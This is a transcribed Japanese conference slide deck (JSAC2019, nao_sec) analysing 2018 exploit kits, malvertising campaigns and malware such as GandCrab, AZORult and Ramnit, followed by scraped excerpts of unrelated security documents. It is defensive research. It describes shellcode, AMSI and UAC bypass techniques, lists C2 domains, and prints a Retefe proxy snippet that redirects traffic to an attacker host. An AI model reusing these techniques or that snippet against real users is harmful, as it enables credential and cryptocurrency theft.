JSAC2019
|
|
|
- はるまさ てっちがわら
- 7 years ago
- Views:
Transcription
1
2 自己紹介 小池倫太郎 セキュリティエンジニア (1 年生 ) nao_sec でマルウェア解析以外を担当 専門は悪性トラフィック スクリプトの解析 中島将太 フォレンジッカー マルウェアアナリスト (1 年生 ) nao_sec ではマルウェアやシェルコード解析を担当 2
3 Drive-by Download 攻撃 ver 2017 攻撃キャンペーン pseudo-darkleech と EITest の活動停止 Seamless Fobos Rulan Ngay の出現と活発化 Malvertising 系の攻撃キャンペーンの繁栄 Exploit Kit Nebula と Disdain の出現と消滅 RIG の繁栄 Shadowfall による Domain Shadowing の停止 IP アドレスを用いた URL へ移行 ( 参考 : 3
4 Drive-by Download 攻撃 ver 2018 攻撃キャンペーン Seamless(PseudoGate) と HookAds の繁栄 CoinsLTD や SlyIP Slots の登場と消滅 BlackTDS の登場 Exploit Kit Underminer と Fallout の登場と繁栄 RIG の衰退 GrandSoft の復活 新たな脆弱性の悪用 4
5 新たな脆弱性 CVE Adobe Flash Player の RCE Magnitude RIG Fallout などで悪用 CVE VBScript Engine の RCE RIG Magnitude GrandSoft Fallout KaiXin などで悪用 CVE VBScript Engine の RCE KaiXin や Fallout などで悪用 CVE Adobe Flash Player の RCE Fallout や Underminer などで悪用 5
6 攻撃キャンペーン 6
7 Seamless / PseudoGate 3 月頃から Seamless の活動が停止 代わりに 7 月頃から PseudoGate が登場し活発化 両方とも日本 カナダ アメリカが標的 Banking Trojan 特に Ramnit を頻繁に使用 Seamless と PseudoGate は同一 Actor の可能性? 7
8 Seamless / PseudoGate Seamless Malvertising Pre-Gate と Gate を用いて RIG へ誘導 ユーザの地理的情報を用いて処理を分岐 標的は日本 カナダ アメリカ 主に Ramnit を使用 8
9 Seamless / PseudoGate PseudoGate Malvertising 正規の Web サイトを改ざんして使用することがある 検知や遮断が困難 GrandSoft や RIG を使用 Panda Banker や Osiris(Kronos) Ramnit などを使用 日本 カナダのクレジットカード 銀行などの情報を窃取 9
10 HookAds Malvertising Decoy サイトと Gate を使って攻撃を行う Kraken Cryptor や GlobeImposter GandCrab などのランサムウェアを使うことが多い 10
11 HookAds Decoy サイト と Gate
12 Exploit Kit 12
13 RIG Exploit Kit 概要 2014 年頃から観測されている Exploit Kit 2016 年 9 月以降最も活発 非常に多くの攻撃キャンペーンで利用されている Fallout の登場でシェアは大幅に減少 それでも多くの攻撃キャンペーンが使用 基本的な機能 構成は昨年から変化せず 13
14 RIG Exploit Kit トラフィック 3 つのトラフィックによって攻撃が行われる 1. Landing Page CVE CVE CVE CVE SWF Exploit を読み込むための html 2. SWF Exploit( 他の脆弱性が悪用された場合は発生しない ) CVE Malware Payload RC4 によって暗号化されたマルウェア 14
15 RIG Exploit Kit Landing Page 難読化は以前よりも簡単に 15
16 RIG Exploit Kit Malware Payload RC4 Encode 16
17 RIG Exploit Kit Landing Page の URL を生成する API のエンドポイントは BlackHat Asia 2018 で発表されており 変化なし ( 引用元 : 17
18 RIG Exploit Kit 利用されたIPアドレスの分布 ロシア:2325, ドイツ:106, ウクライナ:8, カザフスタン6 18
19 GrandSoft Exploit Kit 2018 年 2 月頃から再度活発化 2012 年頃から観測されている PseudoGate で頻繁に利用されている 19
20 GrandSoft Exploit Kit 20
21 GrandSoft Exploit Kit 21
22 Underminer Exploit Kit 2018 年 7 月頃から観測され始めた 日本を中心とした東アジア圏で活発 処理を公開鍵暗号で隠すことで解析を妨害 トラフィックデータを見ただけでは解析することは困難 22
23 Underminer Exploit Kit 23
24 Underminer Exploit Kit form を使ってリダイレクト 送信情報にクライアント環境データを含む 24
25 Underminer Exploit Kit 25
26 Underminer Exploit Kit 26
27 Underminer Exploit Kit 1 公開鍵をダウンロード Random String 2 文字列生成 3 公開鍵で暗号化して送信 Random String ユーザ環境 Random String 4 秘密鍵で復号 Random String 5 文字列で暗号化したデータを送信 Underminer 6 データを復号して実行 27
28 Underminer Exploit Kit 28
29 Underminer Exploit Kit 29
30 Fallout Exploit Kit 2018 年 8 月頃から観測され始めた 非常に活発 多くの攻撃キャンペーンで利用されている RIG の商売敵 HTML から Exploitation に必要なコードを生成 Nuclear Exploit Kit に類似 URL に特徴がない フィルタや検知が困難 30
31 Fallout Exploit Kit 31
32 Fallout Exploit Kit Custom Base64 32
33 Fallout Exploit Kit RC4 33
34 Fallout Exploit Kit CVE 基本的には PoC と同じ 34
35 Fallout Exploit Kit CVE Shellcode 部分以外は PoC と全く同じ 35
36 Fallout Exploit Kit 36
37 Exploitation(shellcode) 37
38 CVE (RIG) RIG Exploit Kit 1 バイトの xor でシェルコードの後半をエンコード CreateProcessA でダウンロードしたマルウェアを実行 38
39 CVE (GrandSoft) 6 月下旬以前のフロー 1. ランダム値の生成 2. ランダム値を使った鍵生成 3. 鍵を URL の末尾に追加 4. 暗号化されたマルウェアのダウンロード 5. デコード * in shellcode 39
40 CVE (GrandSoft) 6 月下旬以降のフロー 1. ランダム値の生成 2. 鍵を URL の末尾に追加 3. 暗号化されたマルウェアのダウンロード 4. デコード * in shellcode 40
41 CVE (Fallout) シェルコードの後半を 1 バイト xor でエンコード 41
42 CVE (Fallout) ハードコードされた鍵で xor 42
43 CVE (Fallout) 1/17 に観測! シェルコードで PowerShell をデコードして CreateProessA で実行 43
44 CVE (Fallout) Anti Malware Scan Interface を Bypass マルウェアをダウンロード 44
45 CVE (Fallout) CreateProcess を C# で定義し マルウェアを実行 45
46 CVE (Fallout) シェルコードはほぼ 8174 と同じ Anti Malware Scan Interface の Bypass マルウェアをダウンロードし IEX で実行 46
47 CVE (Underminer) API は add1505shl5hash32 でハッシュ化されている wininet API で WAV ファイルをダウンロード 47
48 CVE (Underminer) WAV ファイルをパースして データを復号 48
49 PoC 公開から観測まで EK で利用される CVE の殆どが PoC を流用している 公開 観測 Rig GrandSoft Fallout ソース : 49
50 マルウェア 50
51 RIG Exploit Kit Banking Trojan Ransomware Miner Info Stealer RAT GandCrab Slyip Ursnif ZeusPanda SmokeLoader Seamless/PseudoGate Ramnit DarkVNC Kronos Miner HookAds Clipboard Hijacker AZORult Retefe GandCrab Unknown 51 Ursnif AZORult BabylonRAT
52 GrandSoft Exploit Kit Banking Trojan Miner Ransomware Miner BlackTDS GandCrab GandCrab Slyip Ursnif SmokeLoader ZeusPanda PseudoGate AZORult Ramnit AZORult 52
53 Underminer Exploit Kit Trend Micro Malwarebytesのブログによると システムのブートセクタを改変するbootkitとMinerを配布
54 Fallout Exploit Kit Banking Trojan Ransomware Miner Info Stealer RAT SmokeLoader GandCrab Unknown SAVEfiles Ransomware AZORult Ursnif Dridex Paradise Ransomware Vidar Vidar Kraken Cryptor HookAds GlobeImposter Miner SmokeLoader AZORult KPOT GlobeImposter+ CoalaBot NetWireRAT 54
55 AZORult Info Stealer & Downloader 対象ソフトのアカウント情報 ブラウザ履歴 cookie 仮想通貨ウォレット マルウェアのダウンロード Malspam Exploit Kit で配布 2018 年は v3.2(7/17) と v3.3(10/4) にバージョンアップ Underground forum(exploit.in) で宣伝されている 引用元 :The Emergence of the New Azorult Check Point Research 55
56 AZORult 何度もBuilderとPanelがリークしている 56
57 AZORult キャンペーン毎に窃取する情報が変化 HookAds と PseudoGate では収集する対象が異なる 仮想通貨ウォレット
58 AZORult の config Builder Config に細かくウォレットを指定する項目はない バージョンによる差異ではないかと考えられる 58
59 AZORult の C2 nagoyashi.chimkent[.]su RU MAROSNET infolocalip[.]com US Hostwinds po0o0o0o[.]at RU timeweb fyreplittgothin.pw RU VDSina IP でアクセスすることも http[:]// /index.php SG DigitalOcean http[:]// /index.php RU timeweb 59
60 Ramnit Banking Trojan Seamless キャンペーンで長期間使われていた 以下のモジュールを使用 Antivirus Trusted Module v2.0 (AVG Avast Nod32 Norton Bitdefender) アンチウイルスソフトの例外リストに追加 Cookie Grabber v0.5 (IE&CH Export) ブラウザのクッキーの収集 IE & Chrome & FF injector ブラウザへインジェクション VNC (23 port) x64-x86 FF&Chrome reinstall x64-x86 [silent] ブラウザの再インストール Pony based pwd stealer パスワード窃取 60
61 Ramnit の C2 revivalresumed[.]com RU Argotel goldenfreeanhfirst[.]com RU 1stVDS simsim.adygeya[.]su NL Melbicom UAB( ロシアの VPS サービス ) newwfreedomaincom[.]com UA time-host 61
62 Kronos/Osiris 2014 年に登場した 2018 年に Kronos をアップデートした Osiris が登場 RigEK から Drop した Smoke Loader がダウンロード 引用元 : 62
63 Osiris 通信先やファイル名の特徴から Osiris と思われる hxxp://fritsy83[.]website/osiris.exe hxxp://oo00mika84[.]website/osiris_jmjp_auto2_noinj.exe Osiris_jmjp_auto2!?Kronos 63
64 Kronos と Osiris の類似点 ハードコードされた文字列 yaraルールでの検出 = バイナリの特徴が同じ 文字列 C2のエンコードアルゴリズム Kronos+Tor=Osiris? 64
65 GandCrab 2018 年 1 月下旬に登場したランサムウェア 様々攻撃で使用されている Malspam Fake Flash Exploit Kit 感染地域も広域 マーケティング アップデートも活発 販売時にリサーチャーのブログやツイートを引用 65
66 GandCrabのバージョン Fake Adobe Flash Player 経由でも配布 v1のdecryptorリリース v1.x Jan v5.0 v3.0 Feb Seamless経由で初観測 Mar Apr May Jul v4.x v2.x 拡張子の変化 GDCB KRAB 66 拡張子の変化 KRAB ランダム5文字 Sep Dec ネットワーク共有を探す 利用の暗号アルゴリズムの変化 AES Salsa20
67 ReflectiveDLLInjection V1.1 V2.x V3.x で使用 ディスクではなくメモリ上から DLL を読み込むテクニック 67
68 他プロセスへインジェクション V2.1 exploerer.exe V3 svchost.exe ReflectiveDLLInjection を使う 68
69 自プロセスの書き換え V1, V4 以降 メモリ上の自プロセスの領域の一部を書き換える 69
70 解析環境の検知 GetVolumeInformation API の値を比較して any.run を検知してメッセージボックスを表示 70
71 解析環境の検知 メッセージは xor でエンコードして保持していた 71
72 GandCrab の C2 v4 までは.bit というトップレベルドメイン (TLD) を使用していた Namecoin が提供する特殊な TLD 独自の DNS を使用 ns1.cloud-name[.]ru ns1.wowservers[.]ru ドメイン名でよく遊んでいる 72
73 GandCrab の C2 Namecoin 側は実際には Namecoin が提供する DNS を使用せずに 非公式のミラーサービス dnspod.com を利用しているので無関係と弁明 より引用 73
74 GandCrabのC2 Namecoin側は実際にはNamecoinが提供するDNSを使用 せずに 非公式のミラーサービスdnspod.comを利用して いるので無関係と弁明 GandCrabはNamecoinを使ってないので Namecoinドメインを殺しても 何の効果もない 74
75 GandCrab の C2 75
76 GandCrab の C2 v4.0 インターネットに接続してない場合も暗号化される 通信なし v4.1 以降は通常のドメインを使用 ハードコードされたリストを使用 パスをランダムに組み合わせる 76
77 v1.x テキストのみ 77
78 v2.x 78
79 v3.x 79
80 v4.x 80
81 v5.0 ransom noteが日本語に対応 81
82 v5.0.3 ransom noteが戻ってた 82
83 キーボードタイプの取得 ロシア語の設定の場合は動作せず 83
84 UIの言語設定の取得 v4以降に追加 UIの言語設定を確認して 該当する場合は暗号化しない ロシア語 0x419 ウクライナ語 0x422 ベラルーシ語 0x423 タジク語 0x428 アルメニア語 0x42B アゼルバイジャン語 0x42C / 0x82C グルジア語 0x437 カザフスタン 0x43F キルギス語 0x440 トルクメン語 0x442 タタール語 0x444 ルーマニア語 0x818 モルドバ語 0x819 ウズベキスタン語 0x843 84
85 Kraken Cryptor 今年8月下旬に登場したランサムウェア Fallout経由で拡散 ransomware-as-a-service (RaaS).NET Frameworkで実装され 難読化されている v v2.2
86 Kraken Cryptor の対象地域 10/21 に Kraken の作者によって公開された被害の割合 旧ソ連圏諸国を除外 アルメニア アゼルバイジャンベラルーシエストニアジョージアイランカザフスタンキルギスラトビアリトアニアモルドバロシアタジキスタン 引用元 : fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/ トルクメニスタン ウクライナ ウズベキスタン 86
87 eventvwr.exe を利用した UAC 回避 V1.6 のローダーで使用 eventvwr.exe は実行時に以下のレジストリに登録されたパスのファイルを管理者権限で実行する 87
88 SDelete を使った削除 バッチの実行 88
89 config v1.6 89
90 config v2.2 90
91 KPOT Stealer 2018 年 8 月頃に見つかった Information stealer 91
92 KPOT panel C2 パネルのソースコードがリークしている 92
93 KPOT の収集する情報 config で制御可能 端末情報 ブラウザ ビデオチャットなどの保存されたデータ 93
94 Retefe Info Stealer プロキシ設定を追加する C: Users user AppData Roaming Mozilla Firefox Profiles の prefs.js function FindProxyForURL(url, host)(var proxy = "SOCKS5 coughsmoggyspark.co:5555;"; var hosts = new Array('blockchain.info', 'blockchain.com', '*twitter.com*', '*google.*'); for (var i = 0; i < hosts.length; { if (shexpmatch(host, hosts[i])) { return proxy } } return "DIRECT") 94
95 Clipboard Hijacker クリップボードにビットコインのアドレスがコピーされると攻撃者の用意したアドレスに置き換える AddClipboardFormatListener を使ってクリップボードの変化を監視 ビットコインのアドレスとして valid なら置換する 95
96 Clipboard Hijacker リソース領域にエンコードしたアドレスを保持 96
97 まとめ 97
98 まとめ 新たな Exploit Kit の登場 Underminer Exploit Kit 公開鍵と独自のマルウェア Fallout Exploit Kit 特徴のない URL 新たな脆弱性の悪用 CVE 日本を標的とした攻撃キャンペーン PseudoGate Ramnit AZORult Panda Banker Osiris HookAds Kraken Cryptor GlobeImposter GandCrab 98
99 まとめ ロシア語を中心としたフォーラムで宣伝 販売 リサーチャーに対するメッセージ ソースコード内のコメント 言語設定による感染の有無 ロシア語圏 旧ソ連圏諸国を対象外とする 種類は減ったがランサムウェアの開発 感染は活発 特に GandCrab 明示的に日本を対象としたマルウェアも多数存在する Banking Trojan マイナーは下半期は下火 しかし仮想通貨が狙われなくなったわけではない 必要な解析環境 日本を対象とした攻撃の解析には日本語環境や日本の IP の環境が必要となる パブリックなサンドボックス解析を検知し 挙動を変更 99
100 Any Questions? 100
Drive-by Download RIG Exploit Kit
2017 StarC Drive-by Download 1 1 2 2 2.1 Drive-by Download.................................... 2 2.2 RIG Exploit Kit......................................... 2 2.3.............................................
Drive-by Download 攻撃に おけるRIG Exploit Kitの 解析回避手法の調査
高対話型クライアントハニーポット StarC の開発と Drive-by Download 攻撃のトラフィックデータの解析 明治大学総合数理学部小池倫太郎 Drive-by Download攻撃 概要 Webサイトを使ったWebブラウザに対する攻撃 悪性Webサイトへ誘導された脆弱なWebブラウザに対して そのブラ ウザの脆弱性を突くようなコードを送り込んで制御を奪い マルウェ アをダウンロード 実行させる
2.3 1 RIG Exploit Kit (4) 4 Exploit Kit 2.2 RIG Exploit Kit RIG Exploit Kit 1 5 (1) Web Web (2) RIG Exploit Kit URL (3) URL iframe RIG Exploit Kit (4)
StarC Drive-by Download 1 2017 4 Web Web Drive-by Download [1] Driveby Download Web Web Web Drive-by Download Exploit Kit Exploit Kit Web Exploit Kit Drive-by Download Exploit Kit RIG Exploit Kit [2][3][4]
WannaCry とは WannaCry はランサムウェアの一種 WannaCry は ランサムウェアと呼ばれる身代金要求型のマルウェアです WannaCryptor WanaCrypt Wcry といった呼ばれ方もします 一般的にランサムウェアに感染すると 以下のようなデータを使用できないように暗
WannaCry 2017 年 5 月 21 日 マクニカネットワークス株式会社 本資料は 2017 年 5 月 21 日現在の情報を基に作成しております WannaCry とは WannaCry はランサムウェアの一種 WannaCry は ランサムウェアと呼ばれる身代金要求型のマルウェアです WannaCryptor WanaCrypt Wcry といった呼ばれ方もします 一般的にランサムウェアに感染すると
PowerPoint プレゼンテーション
2019.10.16 VBBSS バージョン 6.7 新機能と改善点のご紹介 1. はじめに Ver6.7 公開スケジュールと新ビルド配信のタイミング Ver6.7 新機能 / 改善点一覧 2. セキュリティ対策機能の強化 除外リストへの IPv6 アドレス追加対応 Mac OS への機能追加 3. 管理コンソールの UI 改修 ダッシュボード 画面のウィジェット改修 インストーラのダウンロード 検出されたUSBデバイスの許可
サイバー攻撃者による不正な仮想通貨マイニングの実態
サイバー攻撃者による不正な仮想通貨マイニングの実態 2018 年 11 月 28 日 ( 株 ) セキュアスカイ テクノロジー技術開発部西尾祐哉 自己紹介 所属 株式会社セキュアスカイ テクノロジー技術開発部福岡ラボ 今年新卒入社 ( 社会人 1 年目 ) 現在は脆弱性診断の研修中 佐賀大学大学院工学系研究科知能情報システム学専攻を修了 学生時代は Drive-by Download 攻撃の研究に従事
SAMBA Stunnel(Windows) 編 1. インストール 1 セキュア SAMBA の URL にアクセスし ログインを行います xxx 部分は会社様によって異なります xxxxx 2 Windows 版ダウンロード ボ
操作ガイド Ver.2.3 目次 1. インストール... - 2-2. SAMBA Stunnel 利用... - 8-2.1. 接続確認... - 8-2.2. 編集... - 11-2.3. インポート... - 14-2.4. 削除... - 15-2.5 フォルダショートカットの作成... - 16-3. 動作環境... - 18-4. 参考資料 ( 接続状況が不安定な場合の対処方法について
マルウェアレポート 2017年12月度版
バンキングマルウェアの感染を狙った攻撃が日本に集中 ショートレポート 1. 12 月の概況について 2. バンキングマルウェアの感染を狙った攻撃が日本に集中 3. ランサムウェアのダウンローダーを数多く確認 1. 12 月の概況について 2017 年 12 月 1 日から 12 月 31 日までの間 ESET 製品が国内で検出したマルウェアの比率は 以下のと おりです 国内マルウェア検出数の比率
延命セキュリティ製品 製品名お客様の想定対象 OS McAfee Embedded Control 特定の業務で利用する物理 PC 仮想 PC や Server 2003 Server 2003 ホワイトリスト型 Trend Micro Safe Lock 特定の業務で利用するスタンドアロン PC
延命セキュリティ二つの対策方法 対策 1 ホワイトリスト型 概要 : 動作させてもよいアプリケーションのみ許可し それ以外の全ての動作をブロックすることで 不正な動作を防止します 特長 : 特定用途やスタンドアロンの PC の延命に効果的です リストに登録されたアプリケーションのみ許可 アプリケーション起動制御 不許可アプリケーションは防止 対策 2 仮想パッチ型 概要 : OS アプリケーションの脆弱性を狙った通信をブロックし
マルウェアレポート 2018年3月度版
インターネットバンキングの認証情報窃取を狙ったマルウェアを多く検出 ショートレポート 1. 3 月の概況について 2. バンキングマルウェア Ursnif 感染を狙った添付メール攻撃 3. 偽のシステム警告を表示する詐欺サイト 1. 3 月の概況について 2018 年 3 月 1 日から 3 月 31 日までの間 ESET 製品が国内で検出したマルウェアの種類別の割合は 以 下のとおりです 国内マルウェア検出数の比率
ESET Smart Security 7 リリースノート
================================================================== ESET Smart Security 7 リリースノート キヤノンITソリューションズ株式会社 ================================================================== はじめにキヤノンITソリューションズ製品をご愛顧いただき誠にありがとうございます
システム要件 Trend Micro Safe Lock 2.0 SP1 Trend Micro Safe Lock 2.0 SP1 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Wind
Trend Micro Safe Lock 2.0 SP1 Trend Micro Safe Lock 2.0 SP1 エージェントの OS Client OS Server OS Windows 2000 (SP4) [Professional] Windows XP (SP1/SP2/SP3) [Professional] Windows Vista (SP なし /SP1/SP2) [Business
SAMBA Stunnel(Mac) 編 1. インストール 1 セキュア SAMBA の URL にアクセスし ログインを行います xxxxx 部分は会社様によって異なります xxxxx 2 Mac OS 版ダウンロー
操作ガイド Ver.2.3 目次 1. インストール... - 2-2. SAMBA Stunnel 利用... - 5-2.1. 接続確認... - 5-2.2. 編集... - 9-2.3. インポート... - 12-2.4. 削除... - 14-3. 動作環境... - 15-4. 参考資料 ( 接続状況が不安定な場合の対処方法について )... - 16-4.1. サービスの再起動...
Trend Micro Safe Lock 2.0 Patch1 管理コンソールのシステム要件 OS Windows XP (SP2/SP3) [Professional] Windows 7 (SP なし /SP1) [Professional / Enterprise / Ultimate] W
Trend Micro Safe Lock 2.0 Patch1 Trend Micro Safe Lock 2.0 Patch1 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] Windows XP (SP1/SP2/SP3) [Professional] Windows Vista (SP なし /SP1/SP2)
システム要件 Trend Micro Safe Lock Trend Micro Safe Lock 2.0 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Windows XP (SP1/
Trend Micro Safe Lock Trend Micro Safe Lock 2.0 エージェントの OS Client OS Server OS Windows 2000 (SP4) [Professional] Windows XP (SP1/SP2/SP3) [Professional] Windows Vista (SP なし /SP1/SP2) [Business / Enterprise
Web Gateway資料(EWS比較付)
McAfee Web Gateway 強力な Web セキュリティの提供 マカフィー株式会社 January 11, 2013 McAfee Web Gateway の主要機能 McAfee Web Gateway http:80 Gnutella:80 悪質な SQL Injection マルウェア対策とウイルス対策 Webフィルタリング SSLスキャニングアプリケーション制御キャッシュアクセスログの取得包括的なダッシュボード
CloudEdgeあんしんプラス月次レポート解説書(1_0版) _docx
クラウド型セキュリティ対策サービス Cloud Edge あんしんプラス 月次レポート解説書 第 1.0 版 日本事務器株式会社 改版履歴 版数日付変更内容 1.0 2016/03/07 新規作成 2 目次 1. サービス概要............ 4 1.1. CLOUD EDGE あんしんプラスとは... 4 2. 月次レポート解説............ 5 2.1. VBBSS がインストールされているクライアントの概要...
PowerPoint プレゼンテーション
M0 鈴木宏彰 1 IDN( 国際化ドメイン名 ) とは 通常のドメイン名はアルファベット 数字 ハイフンなどの ASCII 文字の集合からなり 単一の言語でしか表現できない ( 例 :waseda.jp) Unicode を使用することにより多言語にも対応したドメイン名が IDN( 例 : 早稲田.jp) IDN はブラウザ側で Punycode と呼ばれる Unicode から ASCII 文字への変換アルゴリズムを適応してから名前解決が行われる
JPCERT/CC インターネット定点観測レポート[2014年7月1日~9月30日]
JPCERT-IA-2014-03 発行日 :2014-10-28 JPCERT/CC インターネット定点観測レポート [2014 年 7 月 1 日 ~9 月 30 日 ] 1 概況 JPCERT/CC では インターネット上に複数の観測用センサーを分散配置し 不特定多数に向けて発信されるパケットを継続的に収集し 宛先ポート番号や送信元地域ごとに分類して これを脆弱性情報 マルウエアや攻撃ツールの情報などと対比して分析することで
PowerPoint プレゼンテーション
アウトバウンド SSL 通信の可視化 株式会社ネットワールド インターネットへの SSL 通信を可視化してますか? 課題 社内 LAN SSL/TLS トラフィック SSL/TLS トラフィック 情報漏えい セキュリティデバイス 情報漏えい User ノート PC デスクトップ PC Google, Facebook, Twitter などのサービスが常時 SSL を導入 HTTPS はトラフィックを復号化しない限り
ログを活用したActive Directoryに対する攻撃の検知と対策
電子署名者 : Japan Computer Emergency Response Team Coordination Center DN : c=jp, st=tokyo, l=chiyoda-ku, Japan Computer Emergency Response [email protected], o=japan Computer Emergency Response Team
マルウェアレポート 2017年10月度版
DDE を悪用したダウンローダーを多く検出 ショートレポート 2017 年 10 月マルウェア検出状況 1. 10 月の概況について 2. DDE を悪用したダウンローダー 3. 新種のランサムウェアの出現 4. マイニングマルウェアの流行 1. 10 月の概況について 2017 年 10 月 1 日から 10 月 31 日までの間 ESET 製品が国内で検出したマルウェアの比率は 以下のと おりです
マルウェアURSNIFによる漏えい情報を特定せよ ~感染後暗号通信の解読~
Japan Computer Emergency Response Team Coordination Center Japan Security Analyst Conference 2018 電子署名者 : Japan Computer Emergency Response Team Coordination Center DN : c=jp, st=tokyo, l=chiyoda-ku, [email protected],
ログ分析によるサイバー攻撃検知システムの構築
MWS( ログ解析 ) 2B1-1 企業内ネットワークの通信ログを用いたサイバー攻撃検知システム 大谷尚通北野美紗重田真義 ( 株 )NTT データ品質保証部情報セキュリティ推進室 NTTDATA-CERT 1. サイバー攻撃の状況 1.1 最新のサイバー攻撃 ~Web 待ち伏せ攻撃 ~ 3 / 23 ユーザがアクセスする可能性の高い Web ページへ Drive-By-Download 攻撃を仕掛ける
PC にソフトをインストールすることによって OpenVPN でセキュア SAMBA へ接続することができます 注意 OpenVPN 接続は仮想 IP を使用します ローカル環境にて IP 設定が被らない事をご確認下さい 万が一仮想 IP とローカル環境 IP が被るとローカル環境内接続が行えなくな
操作ガイド Ver.2.3 目次 1. インストール... - 2-2. SAMBA Remote 利用... - 9-2.1. 接続確認... - 9-2.2. 自動接続... - 11-2.3. 編集... - 13-2.4. インポート... - 16-2.5. 削除... - 18-2.6. 参考資料 ( 接続状況が不安定な場合の対処方法について )... - 19-2.6.1. サービスの再起動...
9 WEB監視
2018/10/31 02:15 1/8 9 WEB 監視 9 WEB 監視 9.1 目標 Zabbix ウェブ監視は以下を目標に開発されています : ウェブアプリケーションのパフォーマンスの監視 ウェブアプリケーションの可用性の監視 HTTPとHTTPSのサポート 複数ステップで構成される複雑なシナリオ (HTTP 要求 ) のサポート 2010/08/08 08:16 Kumi 9.2 概要 Zabbix
Flash Player ローカル設定マネージャー
ADOBE FLASH PLAYER http://help.adobe.com/ja_jp/legalnotices/index.html iii................................................................................................................. 1...........................................................................................................
NortonAntiVirus for MicrosoftExchange
NortonAntiVirus for MicrosoftExchange インストール手順書 このドキュメントは NortonAntiVirus 2.5 for MicrosoftExchange のインストール手順を示します 2001 年 7 月 1 1.. Norton AntiVirus for Microsoft Exchange のアンインストール まず 以前のバージョンの NortonAntiVirus
Agenda 1. 今回のバージョンアップについて a. バージョンアップ概要 b. バージョンアップ目的 c. 新バージョンのシステム要件に関する注意事項 d. 現行バージョンのサポート期間 2. 対応プラットフォームの追加 3. 新機能の追加および機能強化 2
サーバセキュリティ (SS) あんしんプラス バージョンアップのご案内 DeepSecurity Ver9.6SP1 から Ver10.0 へ 2018/9/7 Agenda 1. 今回のバージョンアップについて a. バージョンアップ概要 b. バージョンアップ目的 c. 新バージョンのシステム要件に関する注意事項 d. 現行バージョンのサポート期間 2. 対応プラットフォームの追加 3. 新機能の追加および機能強化
LINE WORKS 管理者トレーニング 4. セキュリティ管理 Ver 年 6 月版
LINE WORKS 管理者トレーニング 4. セキュリティ管理 Ver 4.1.0 2018 年 6 月版 4. セキュリティ管理 4.1 セキュリティ機能 4.2 ネットワークセキュリティ 4.3 アカウントセキュリティ 4.4 モバイルセキュリティ 4.5 ファイルセキュリティ 2 3 4.1 セキュリティ機能 管理画面のセキュリティ設定 4 セキュリティ機能 (1) [ セキュリティ ] [
/ 12 1 セキュリティ対策ツールサポート情報 http://f-security.jp/ 1...6 2...8 3... 13 4... 16 5... 18 6...20 7... 24 8... 26 9 Web... 28 10... 40 11...44 12... 47 13... 50 14... 54 15 OS... 58 16... 60 17... 62 18... 72...
9. システム設定 9-1 ネットワーク設定 itmはインターネットを経由して遠隔地から操作を行ったり 異常が発生したときに電子メールで連絡を受け取ることが可能です これらの機能を利用するにはiTM 本体のネットワーク設定が必要になります 設定の手順を説明します 1. メニューリスト画面のシステム設
9. システム設定 9-1 ネットワーク設定 itmはインターネットを経由して遠隔地から操作を行ったり 異常が発生したときに電子メールで連絡を受け取ることが可能です これらの機能を利用するにはiTM 本体のネットワーク設定が必要になります 設定の手順を説明します 1. メニューリスト画面のシステム設定タブで (4) ネットワーク設定ボタンをタッチして ネットワーク設定画面を表示させます (4-5 メニューリスト画面
Maser - User Operation Manual
Maser 3 Cell Innovation User Operation Manual 2013.4.1 1 目次 1. はじめに... 3 1.1. 推奨動作環境... 3 2. データの登録... 4 2.1. プロジェクトの作成... 4 2.2. Projectへのデータのアップロード... 8 2.2.1. HTTPSでのアップロード... 8 2.2.2. SFTPでのアップロード...
Sample 5
既存ネットワークセキュリテイ製品のログ解析はもう不要!? ~AI による自動化 監視不要の新ネットワークセキュリティ Seceon!~ 2017 年 11 月 1 日ルートリフ株式会社テクノロジーサービス本部ネットワークエンジニア東海林昂宏 Introduce our company RootRiff の紹介 会社概要 会社名 : ルートリフ株式会社設立 :2015 年 2 月事業内容 :IT インフラに関わるコンサルティング
WebEx を使用したリモート調査とは お客様のデスクトップ画面を共有し 障害調査を共同で実施するサービスです リモート調査は 精度の高い調査により 障害の早期解決を図るために実施します 対象の機器にアクセスできる中継端末をご用意頂く必要があります インターネット接続が可能な中継端末を経由して調査を
WebEx を使用したリモート調査 WebEx を使用したリモート調査とは お客様のデスクトップ画面を共有し 障害調査を共同で実施するサービスです リモート調査は 精度の高い調査により 障害の早期解決を図るために実施します 対象の機器にアクセスできる中継端末をご用意頂く必要があります インターネット接続が可能な中継端末を経由して調査を実施します 調査対象の機器がインターネットへ接続されている必要はありません
Trend Micro Cloud App Security ご紹介資料
クラウドアプリケーション向けセキュリティ Trend Micro Cloud App Security TM ご紹介資料 トレンドマイクロ株式会社 本書に関する著作権は トレンドマイクロ株式会社へ独占的に帰属します トレンドマイクロ株式会社が事前に承諾している場合を除き 形態および手段を問わず 本書またはその一部を複製することは禁じられています 本ドキュメントの作成にあたっては細心の注意を払っていますが
SAMBA Remote(Mac) 編 PC にソフトをインストールすることによって OpenVPN でセキュア SAMBA へ接続することができます 注意 OpenVPN 接続は仮想 IP を使用します ローカル環境にて IP 設定が被らない事をご確認下さい 万が一仮想 IP とローカル環境 IP
操作ガイド Ver.2.3 目次 1. インストール... - 2-2. SAMBA Remote 利用... - 5-2.1. 接続確認... - 5-2.2. 自動接続... - 10-2.3. 編集... - 12-2.4. インポート... - 15-2.5. 削除... - 17-2.6. 参考資料 ( 接続状況が不安定な場合の対処方法について )... - 18-2.6.1. サービスの再起動...
McAfee Application Control ご紹介
SHieldWARE ファイル改ざん検知 / 防御機能 株式会社富士通ソーシアルサイエンスラボラトリ ファイル変更監視概要 指定したファイル / ディレクトリへの編集操作をリアルタイムで検知 サーバ 不正ユーザー Web コンテンツディレクトリ ログファイルディレクトリ ファイル読込 ファイル書込 事前定義したファイルへの書込を検知しログ出力 事前定義したファイルへの書込を検知しログ出力 改ざん 改ざん
Tor Browser について ( その 2) Onion サービス Onion サービス ( 以前は hidden サービス と呼ばれていました ) は Tor ネットワーク経由でしかアクセス出来ないサービス ( ウェブサイト等 ) です Onion サービスは 非プライベートウェブ上の通常のサ
Tor Browser について ( その 2) Onion サービス Onion サービス ( 以前は hidden サービス と呼ばれていました ) は Tor ネットワーク経由でしかアクセス出来ないサービス ( ウェブサイト等 ) です Onion サービスは 非プライベートウェブ上の通常のサービスよりも幾つかの利点を提供します : Onion サービスの場所と IP アドレスは隠されている為
